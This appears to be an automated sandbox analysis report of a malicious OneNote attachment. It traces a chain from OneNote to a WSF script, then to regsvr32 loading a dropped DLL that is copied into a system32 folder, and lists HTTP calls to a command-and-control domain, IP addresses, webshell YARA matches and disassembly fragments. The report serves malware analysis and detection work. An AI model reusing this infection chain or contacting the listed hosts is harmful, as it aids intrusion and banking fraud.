                Source: unknownDNS traffic detected: queries for: penshorn.org
                Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2

                E-Banking Fraud

                Source: Yara match | File source: 4.2.regsvr32.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.regsvr32.exe.bc0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.regsvr32.exe.dd0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.regsvr32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.389837714.0000000005222000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.401747344.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: 00000001.00000003.401867106.0000000005166000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\VZzVLyswcgycmo\
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180006818
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000000018000B878
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180007110
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180008D28
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180014555
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_009E0000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1709C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1A000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0CC14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E07D6C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0263C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E08BC8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E18FC8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E120E0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E03CF4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E090F8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E048FC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0F8C4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E15CC4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E080CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E108CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E014D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E13CD4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E018DC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E098AC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1A8B0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0DCB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E294BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E15880
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E04C84
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1CC84
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0AC94
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1B460
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E16C70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0D474
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E02C78
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0C078
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0B07C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E07840
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1C44C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E25450
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1C058
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E11030
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1EC30
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0B83C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E01000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E09408
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E07C08
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E2181C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1D5F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E115C8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1BDA0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E095BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E14D20
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E11924
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1AD28
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E07530
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1B130
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E06138
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E28500
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1610C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E29910
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E17518
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E092F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1EAC0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0D6CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E196D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0AAB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E04EB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E03ABC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1A6BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E08A8C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E24E8C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0BE90
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E14A90
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0A660
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E10A70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E03274
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1A244
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0B258
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0F65C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0BA2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E18A2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E10E2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1662C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E15A00
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E28A00
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E18E08
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E03E0C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1020C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E04214
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0461C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E227EC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0A7F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E197CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E13FD0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E02FD4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E033D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0DBA0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E08FB0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0FFB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E18BB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E15384
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E01B94
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1D770
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1CF70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E08378
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0F77C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1E750
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E04758
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0975C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0D33C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E1E310
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E0EF14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E13B14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00E14F18
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00BB0000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E108CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0640A
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0CC14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E07D6C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E176A8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E06E42
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E20618
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E063F4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E08BC8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E18FC8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E13FD0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E273A4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E09B79
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E120E0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E03CF4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E090F8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E048FC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0F8C4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E15CC4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E080CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E014D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E13CD4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E21CD4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E018DC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E244A8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E098AC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1A8B0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0DCB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E294BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E15880
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E04C84
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1CC84
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E2488C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0AC94
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E21494
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1709C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1B460
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E25868
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E16C70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0D474
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E02C78
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0C078
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0B07C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E07840
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1C44C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E25450
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1C058
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E11030
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1EC30
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0B83C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E01000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1A000
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E09408
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E07C08
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E07410
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E2181C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1D5F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E115C8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1BDA0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E095BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E24D64
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E14D20
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E11924
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1AD28
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1B130
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E06138
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E28500
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E22100
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1610C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E29910
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E17518
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E092F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E236FC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1EAC0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0D6CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E196D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E22AB0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0AAB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E04EB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E03ABC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1A6BC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E22E84
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E08A8C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E24E8C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0BE90
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E14A90
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0A660
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E10A70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E03274
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1A244
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E26E48
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0B258
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0F65C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0BA2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E18A2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E10E2C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1662C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0263C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E15A00
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E28A00
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E18E08
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E03E0C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1020C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E04214
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0461C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E227EC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0A7F0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1FFFC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E197CC
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E02FD4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E033D4
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0DBA0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E247A8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E08FB0
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0FFB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E18BB8
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E15384
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E01B94
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E28B68
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1D770
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1CF70
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E08378
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0F77C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1E750
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E04758
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0975C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0D33C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E1E310
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E28310
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E0EF14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E13B14
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E14F18
                Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00E25B1C
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert
                Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject
                Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                Source: OMICS.one | ReversingLabs: Detection: 30%
                Source: OMICS.one | Virustotal: Detection: 40%
                Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | File created: C:\Users\user\Documents\{5F028F94-197F-4191-9736-A96A0CA2E032}
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE | File created: C:\Users\user\AppData\Local\Temp\{784AD066-55F5-487F-9E39-1E5302D19FF7} - OProcSessId.dat
                Source: classification engine | Classification label: mal100.troj.expl.evad.winONE@9/11@1/49
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E08BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,3_2_00E08BC8
                Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A0FC push ebp; iretd 3_2_00E0A0FD
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E180D7 push ebp; retf 3_2_00E180D8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E06CDE push esi; iretd 3_2_00E06CDF
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E06C9F pushad ; ret 3_2_00E06CAA
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A1D2 push ebp; iretd 3_2_00E0A1D3
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17987 push ebp; iretd 3_2_00E1798F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D4E push ebp; iretd 3_2_00E17D4F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E09D51 push ebp; retf 3_2_00E09D5A
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18157 push ebp; retf 3_2_00E18158
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D25 push 4D8BFFFFh; retf 3_2_00E17D2A
